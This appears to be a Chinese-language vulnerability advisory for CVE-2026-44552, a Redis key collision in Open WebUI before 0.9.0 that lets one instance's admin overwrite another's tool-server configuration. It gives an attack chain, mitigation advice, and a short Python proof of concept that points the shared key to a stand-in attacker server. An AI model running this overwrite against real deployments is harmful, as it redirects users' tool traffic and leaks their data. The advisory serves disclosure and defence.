CVE-2026-44552 CVSS 8.7 高危

CVE-2026-44552 Open WebUI配置覆盖漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44552

漏洞类型

配置覆盖

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI在0.9.0版本之前存在安全漏洞。当多个实例共享Redis数据库时，由于未对`tool_servers`和`terminal_servers`键使用前缀，导致不同实例间的配置发生冲突。实例A的管理员操作会覆盖实例B的配置，造成信息泄露和完整性风险。

技术细节

该漏洞源于代码逻辑缺陷。在共享Redis部署模式下，`utils/tools.py`文件在写入配置数据时未添加实例特定的前缀标识。这导致全局唯一的键名被多个实例共享。当高权限管理员在某一实例修改工具服务器配置时，会直接修改Redis中的公共键值。其他实例读取该键时，获取的是被篡改后的配置，而非自身的配置数据。

攻击链分析

STEP 1

步骤1

攻击者部署多个Open WebUI实例（或利用现有的多实例环境），这些实例共享同一个Redis数据库。

STEP 2

步骤2

攻击者作为管理员在实例A上修改工具服务器配置。

STEP 3

步骤3

实例A将配置写入Redis数据库中的`tool_servers`键，由于无前缀，该键为全局共享。

STEP 4

步骤4

实例B的用户访问服务时，从Redis读取被实例A覆盖的配置，导致信息泄露或配置被篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC: Open WebUI Configuration Overwrite via Redis Key Collision
# This script demonstrates how an admin on Instance A can overwrite Instance B's config.

import redis

# Connect to the shared Redis instance
r = redis.Redis(host='shared-redis-host', port=6379, db=0)

# Simulating Instance A (Attacker) setting a malicious config
# In utils/tools.py, the key 'tool_servers' is used without a prefix.
malicious_config = {"server": "http://attacker-controlled-server.com", "token": "stolen-token"}

# Exploit: Write to the unprefixed key
r.set('tool_servers', str(malicious_config))

print("[+] Instance A (Attacker) overwrote the shared 'tool_servers' key.")
print(f"[+] New value: {r.get('tool_servers')}")

# Simulating Instance B (Victim) reading the config
victim_config = r.get('tool_servers')
print(f"[-] Instance B (Victim) reads config: {victim_config}")
# Victim now uses the attacker's tool server, potentially leaking data.

影响范围

Open WebUI < 0.9.0

防御指南

临时缓解措施

建议立即将Open WebUI升级至0.9.0版本。若无法立即升级，请确保各Open WebUI实例使用独立的Redis数据库实例，避免多实例共享单一存储，以防止配置数据相互覆盖。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表